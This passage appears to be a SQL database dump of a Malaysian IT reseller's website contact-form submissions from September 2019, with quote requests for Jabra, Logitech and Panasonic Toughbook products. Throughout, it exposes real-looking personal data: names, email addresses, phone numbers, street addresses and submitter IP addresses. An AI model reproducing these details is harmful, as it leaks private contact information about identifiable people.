QD\";i:15;s:21:\"Jabra BIZ 2300 QD DUO\";i:16;s:14:\"Jabra Biz 1500\";i:17;s:22:\"Jabra Biz 1500 DUO USB\";i:18;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Jabra Evolve 65t\";}i:7;a:7:{s:2:\"id\";s:3:\"132\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:255:\"Dear Sir/Madam, I would like to request a quote for a Jabra Evolve 65t (6598-832-109) Titanium Black. I would also know how long it would take to ship the items to Kemaman Supply Base (KSB). Hopefully, will get your quotation before 3.00pm 18th Sept 2019.\";}i:8;a:7:{s:2:\"id\";s:3:\"125\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:3:\"127\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:2:\"22\";}i:10;a:7:{s:2:\"id\";s:3:\"128\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:3:\"125\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Jabra)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-17 12:06:58','115.134.24.173','1'),(303,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"Aaron Vimal Samuel\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"aaron@knowledgecom.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0192392625\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Knowledgecom Corporation Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:117:\"Hi there. We are looking to purchase a room system to use for Microsoft Teams. Would you be able to guide us? Thanks!\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"15\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-17 12:23:55','202.186.89.100','1'),(304,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:4:\"saff\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"safuan.elias@kpwkm.gov.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0137549816\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:54:\"kementerian pembangunan wanita keluarga dan masyarakat\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"presint 4, putrajaya\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"99\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-17 12:49:07','203.217.176.78','1'),(305,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Samir Omar\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"samir@reconz.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"01124057305\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Reconz Consulting\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"Need quotation for windows server OS\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"13\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-18 13:17:23','175.145.220.11','1'),(306,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Benn Rakquidean\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"bennkasim1@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0164242746\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"BNZ GLOBAL RESOURCES\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"PKB 32 Jalan Omar\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"TOUGHPAD FZ-M1\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:322:\"I would to enquire if u still hv this below spec. .. Intel i5-3437U vProcessor (1.9Ghz,3MB intel smart cache,intel 7 series express chipset QM77)/ 10.1&quot; Active Matrix (TFT IPS Pro Next Colorado LCD,1920x1200 pixels,WUXGA (up to 800cd/m)/10 finger Capative Tough Screen + Digitiser/window 8.1/4GB DDR3L SDRAM / 128 SSD\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"15\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-18 20:22:28','115.164.73.113','1'),(307,3,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"23\";s:4:\"slug\";s:33:\"get-quotation-panasonic-toughbook\";s:4:\"name\";s:35:\"Get Quotation (PANASONIC TOUGHBOOK)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"27\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"Adam Bin Muhamed Avvu\";}i:2;a:7:{s:2:\"id\";s:2:\"28\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"adamavvu@yahoo.com\";}i:3;a:7:{s:2:\"id\";s:2:\"31\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0129119494\";}i:4;a:7:{s:2:\"id\";s:2:\"29\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Ledang Synergy Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"33\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:61:\"No 4, MTK 7, Lot 836 Batu 2, Parti Bunga, 84000 Tangkak Johor\";}i:6;a:7:{s:2:\"id\";s:2:\"32\";s:4:\"slug\";s:19:\"panasonic-toughbook\";s:4:\"name\";s:19:\"PANASONIC TOUGHBOOK\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:379:\"a:14:{i:0;s:12:\"TOUGHBOOK 33\";i:1;s:12:\"TOUGHBOOK 31\";i:2;s:12:\"TOUGHBOOK 54\";i:3;s:12:\"TOUGHBOOK 20\";i:4;s:14:\"TOUGHPAD FZ-Q2\";i:5;s:12:\"TOUGHBOOK T1\";i:6;s:12:\"TOUGHBOOK N1\";i:7;s:14:\"TOUGHPAD FZ-X1\";i:8;s:12:\"TOUGHBOOK L1\";i:9;s:14:\"TOUGHPAD FZ-M1\";i:10;s:14:\"TOUGHPAD FZ-G1\";i:11;s:14:\"TOUGHPAD FZ-A2\";i:12;s:14:\"TOUGHPAD FZ-B2\";i:13;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"TOUGHPAD FZ-G1\";}i:7;a:7:{s:2:\"id\";s:2:\"30\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:274:\"Hi. My name Adam from Ledang Synergy Sdn Bhd, Muar Johor i need quotation for Panasonic Tough-pad FZ-G1. This one for Government Supply Job. Can You Assist Me ASAP Here Detail For Quotation Ledang Synergy Sdn Bhd No 4, MTK 7, Lot 836 Batu 2, Parti Bunga, 84000 Tangkak Johor\";}i:8;a:7:{s:2:\"id\";s:2:\"24\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"25\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:2:\"87\";}i:10;a:7:{s:2:\"id\";s:2:\"26\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"24\";s:5:\"value\";s:0:\"\";}}','Get Quotation (PANASONIC TOUGHBOOK)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-18 23:07:17','183.171.78.192','1'),(308,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Peter TEO\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"peter.teokn@ktpworld.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60126578889\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Surbana Jurong\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:46:\"Suite 11.01 CentrePoint North, Mid Valley City\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"SMARTDOCK\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-19 10:32:21','121.121.96.143','1'),(309,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Jason Christopher\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"jason@axiata.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0194810087\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"Axiata Group Berhad\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:79:\"Can Logitech VC solution compatible with Zoom room &amp; Microsoft office Team?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"15\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-09-19 16:05:29','203.82.70.171','1'),(310,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"WAQAR 